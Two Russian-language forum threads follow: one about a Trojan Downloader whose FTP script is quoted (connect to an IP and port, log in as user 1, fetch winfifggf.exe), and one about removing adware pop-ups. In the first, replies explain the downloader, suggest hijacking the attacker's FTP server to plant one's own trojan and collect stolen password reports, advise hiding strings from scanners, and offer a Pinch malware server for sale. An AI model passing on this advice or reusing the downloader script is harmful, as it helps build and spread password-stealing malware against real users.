Trojan Downloader
 

Люди! Короче у меня Каспер орёт и пишет что найде Trojan Downloader! Я через каспера нашёл трой и посмотрел из чего он написан!


open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?

Да троян это тебе дают его ты его запускаешь и он с указанного сайта перекидывает трой на твою такчку а потом запускает.

А вот что он тырит с меня этот троян? 30294 чё эти цыфры ознаяают? и как такойже сделать только в свою пользу?
Почему так распрашиваю потому что конкретно взялся за дело терь только изучаю виры и трояны! поэтому ного вопросов!

30294 ето пароль на твой компутер! именно его троян и тЫрит!
чтобы "обернуть ето себе на пользу" есть два варианта действий
1 - незамедлительный формат C
2 - прекращаешь страдать х***ей прямо сейчас

зы:
на заметку юным натуралистам
за 10вмз предоставлю для исследований прекрасный екземпляр пинчевского сервака. по вопросам оптовой закупки обращаться в приват =)

Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит :)

Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe".

Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так)
Либо через реестр после перезагрузки.

Как это можно использовать?
Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись.
Тогда делаешь своего троя и заменяешь родного на своего =] Гы..
И забираешь отчеты с паролями со своего мыла.

У фтп сервера, если читать RFC, видно такие команды
USER username
PASS password
а не USER username password,
далее
команды GET вообще несуществует, есть RETR и STOR
и команды OPEN тоже нет

однако, возможно это сценарий для ftp-клиента в Windows (стардартного), но никак не для фтп сервера

А вот так, надо хотябы как-то шифровать строки, чтобы их видно небыло в плейнтекст. А не на делфи мучить комп)

Download. Troyan
 

Уважаемые форумчанею. Помогите избавиться от всплывающих окон эксплоера. Гуляя по сайтам, мой антивирус предупреждал меня о "Download. Troyan", но несмотря на это я все-равно открывала странички и закачивала необходимые мне файлы. Теперь каждую минуту ко мне лезет реклама, даже если все окна закрыты. Я проверяла компьютер:
Spybot - Search & Destroy
Ad-Aware SE Personal
Registry Mechanic
HijackThis

Все они находят проблему, якобы удаляют опасные файлы, но потом оповещают меня о том, что неудалили, т.к. в памяти где то они остались. Ничего не помогает. Я блокировала всплывающие окна, вносила в черный список, удалила все куки, временные файлы и исключения- ничего не помогает.
Что мне делать?
Адреса всплывающих окон начинаются и заканчиваются на "http://www...................com/normal/yyy102.html"

Чел, ты ошибся буквой - проверял а не "проверяла"

http://stopie.org.ru/

Почему "проверял"? Я- "она", я проверяла.
Ссылочка не открывается.

Вот сюда зайди http://stopie.org.ru/links.htm (там только для Firefox) :)